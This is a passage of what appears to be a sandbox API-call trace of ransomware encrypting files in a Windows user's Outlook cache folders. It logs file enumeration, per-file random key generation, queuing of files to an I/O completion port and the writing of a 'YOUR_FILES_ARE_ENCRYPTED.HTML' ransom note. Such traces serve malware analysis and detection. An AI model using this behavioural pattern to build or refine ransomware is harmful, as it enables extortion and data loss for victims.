(lpString1="Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.550] PathFindExtensionW (pszPath="Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat") returned=".dat" [0163.550] lstrlenW (lpString=".dat") returned 4 [0163.550] PathFindExtensionW (pszPath="Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat") returned=".dat" [0163.550] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.551] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_AvailabilityOptions_2_A8C908A0C934B84387DFB81FDE9F8FC3.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_availabilityoptions_2_a8c908a0c934b84387dfb81fde9f8fc3.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.551] 
GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=422) returned 1 [0163.551] CloseHandle (hObject=0x5b8) returned 1 [0163.551] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x24c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat", cAlternateFileName="STREAM~2.DAT")) returned 1 [0163.551] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat") returned 120 [0163.551] lstrcmpW (lpString1="Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.551] PathFindExtensionW (pszPath="Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat") returned=".dat" [0163.552] lstrlenW (lpString=".dat") returned 4 [0163.552] PathFindExtensionW (pszPath="Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat") returned=".dat" [0163.552] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.552] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_calendar_2_6052b5708c2e614898a26fbe48bfceac.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.552] 
GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=588) returned 1 [0163.552] GetProcessHeap () returned 0x270000 [0163.552] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.557] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="C6") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="98") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="16") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="6E") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="A5") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="55") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="7F") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="9D") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="07") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="67") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="8C") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="CB") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="6F") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="95") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="A3") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="4A") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="46") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="27") returned 2 [0163.557] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="13") returned 2 [0163.558] 
wsprintfW (in: param_1=0x4ebd15e, param_2="%02X" | out: param_1="EA") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="43") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="B2") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="6B") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="70") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="34") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="77") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="BD") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="2E") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="01") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="4E") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="5B") returned 2 [0163.558] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="76") returned 2 [0163.558] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_Calendar_2_6052B5708C2E614898A26FBE48BFCEAC.dat" [0163.558] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.559] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.559] 
FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x10b, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat", cAlternateFileName="STE561~1.DAT")) returned 1 [0163.559] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat") returned 129 [0163.559] lstrcmpW (lpString1="Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.559] PathFindExtensionW (pszPath="Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat") returned=".dat" [0163.559] lstrlenW (lpString=".dat") returned 4 [0163.559] PathFindExtensionW (pszPath="Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat") returned=".dat" [0163.559] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.559] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_ConversationPrefs_2_83E4BC2203C4094DBF3EEE441393BE66.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_conversationprefs_2_83e4bc2203c4094dbf3eee441393be66.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.559] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=267) returned 1 
[0163.559] CloseHandle (hObject=0x594) returned 1 [0163.559] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0xc4, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat", cAlternateFileName="STF81A~1.DAT")) returned 1 [0163.559] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat") returned 119 [0163.559] lstrcmpW (lpString1="Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.560] PathFindExtensionW (pszPath="Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat") returned=".dat" [0163.560] lstrlenW (lpString=".dat") returned 4 [0163.560] PathFindExtensionW (pszPath="Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat") returned=".dat" [0163.560] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_RssRule_2_D8B5947E63A68647A992EDD6F0AC89D4.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_rssrule_2_d8b5947e63a68647a992edd6f0ac89d4.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.560] GetFileSizeEx (in: hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=196) returned 1 [0163.560] 
CloseHandle (hObject=0x594) returned 1 [0163.560] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bc660f0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x11c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat", cAlternateFileName="ST7B66~1.DAT")) returned 1 [0163.560] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat") returned 133 [0163.560] lstrcmpW (lpString1="Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.560] PathFindExtensionW (pszPath="Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat") returned=".dat" [0163.560] lstrlenW (lpString=".dat") returned 4 [0163.560] PathFindExtensionW (pszPath="Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat") returned=".dat" [0163.560] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.560] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_TableViewPreviewPrefs_2_CEA763EE35E3B640818BFE4516517EBA.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_tableviewpreviewprefs_2_cea763ee35e3b640818bfe4516517eba.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x594 [0163.562] GetFileSizeEx (in: 
hFile=0x594, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=284) returned 1 [0163.563] CloseHandle (hObject=0x594) returned 1 [0163.563] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6b32cbb0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6b32cbb0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0xcc, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0163.563] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat") returned 119 [0163.563] lstrcmpW (lpString1="Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.571] PathFindExtensionW (pszPath="Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat") returned=".dat" [0163.572] lstrlenW (lpString=".dat") returned 4 [0163.572] PathFindExtensionW (pszPath="Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat") returned=".dat" [0163.572] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.572] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_TCPrefs_2_E0983FEFB6FD1D4BA2C919039ED642C6.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_tcprefs_2_e0983fefb6fd1d4ba2c919039ed642c6.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.572] GetFileSizeEx (in: hFile=0x5b8, 
lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=204) returned 1 [0163.572] CloseHandle (hObject=0x5b8) returned 1 [0163.573] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x27c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat", cAlternateFileName="STREAM~4.DAT")) returned 1 [0163.573] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat") returned 121 [0163.573] lstrcmpW (lpString1="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.573] PathFindExtensionW (pszPath="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat") returned=".dat" [0163.573] lstrlenW (lpString=".dat") returned 4 [0163.573] PathFindExtensionW (pszPath="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat") returned=".dat" [0163.573] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0163.573] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\stream_workhours_1_a1240b8d7d001341bae5fe73e3218ee4.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0163.574] GetFileSizeEx (in: 
hFile=0x5b8, lpFileSize=0x4ebd1f8 | out: lpFileSize=0x4ebd1f8*=636) returned 1 [0163.574] GetProcessHeap () returned 0x270000 [0163.574] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0163.575] wsprintfW (in: param_1=0x4ebd112, param_2="%02X" | out: param_1="39") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd116, param_2="%02X" | out: param_1="1D") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd11a, param_2="%02X" | out: param_1="2D") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd11e, param_2="%02X" | out: param_1="9E") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd122, param_2="%02X" | out: param_1="CC") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd126, param_2="%02X" | out: param_1="C9") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd12a, param_2="%02X" | out: param_1="9F") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd12e, param_2="%02X" | out: param_1="BB") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd132, param_2="%02X" | out: param_1="B2") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd136, param_2="%02X" | out: param_1="48") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd13a, param_2="%02X" | out: param_1="66") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd13e, param_2="%02X" | out: param_1="29") returned 2 [0163.575] wsprintfW (in: param_1=0x4ebd142, param_2="%02X" | out: param_1="A2") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd146, param_2="%02X" | out: param_1="A8") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd14a, param_2="%02X" | out: param_1="76") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd14e, param_2="%02X" | out: param_1="A8") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd152, param_2="%02X" | out: param_1="D1") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd156, param_2="%02X" | out: param_1="C7") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd15a, param_2="%02X" | out: param_1="A0") returned 2 [0163.576] wsprintfW (in: 
param_1=0x4ebd15e, param_2="%02X" | out: param_1="E0") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd162, param_2="%02X" | out: param_1="F9") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd166, param_2="%02X" | out: param_1="D8") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd16a, param_2="%02X" | out: param_1="B2") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd16e, param_2="%02X" | out: param_1="DC") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd172, param_2="%02X" | out: param_1="CE") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd176, param_2="%02X" | out: param_1="D4") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd17a, param_2="%02X" | out: param_1="AD") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd17e, param_2="%02X" | out: param_1="D9") returned 2 [0163.576] wsprintfW (in: param_1=0x4ebd182, param_2="%02X" | out: param_1="B1") returned 2 [0163.577] wsprintfW (in: param_1=0x4ebd186, param_2="%02X" | out: param_1="5C") returned 2 [0163.577] wsprintfW (in: param_1=0x4ebd18a, param_2="%02X" | out: param_1="24") returned 2 [0163.577] wsprintfW (in: param_1=0x4ebd18e, param_2="%02X" | out: param_1="56") returned 2 [0163.577] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat" [0163.577] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0163.577] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0163.590] FindNextFileW (in: 
hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6bbf3cd0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bbf3cd0, ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bbf3cd0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x27c, dwReserved0=0x0, dwReserved1=0x60, cFileName="Stream_WorkHours_1_A1240B8D7D001341BAE5FE73E3218EE4.dat", cAlternateFileName="STREAM~4.DAT")) returned 0 [0163.590] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.590] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 95 [0163.590] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\RoamCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\roamcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.590] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.593] CloseHandle (hObject=0x58c) returned 1 [0163.593] GetProcessHeap () returned 0x270000 [0163.594] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.594] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b32cbb0, ftCreationTime.dwHighDateTime=0x1d7100c, ftLastAccessTime.dwLowDateTime=0x6bc660f0, 
ftLastAccessTime.dwHighDateTime=0x1d7100c, ftLastWriteTime.dwLowDateTime=0x6bc660f0, ftLastWriteTime.dwHighDateTime=0x1d7100c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="RoamCache", cAlternateFileName="ROAMCA~1")) returned 0 [0163.594] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.594] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 85 [0163.595] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Outlook\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\outlook\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.595] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.597] CloseHandle (hObject=0x4a8) returned 1 [0163.597] GetProcessHeap () returned 0x270000 [0163.598] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.598] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0x56fc1a00, ftLastAccessTime.dwHighDateTime=0x1d72468, ftLastWriteTime.dwLowDateTime=0x56fc1a00, ftLastWriteTime.dwHighDateTime=0x1d72468, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows", 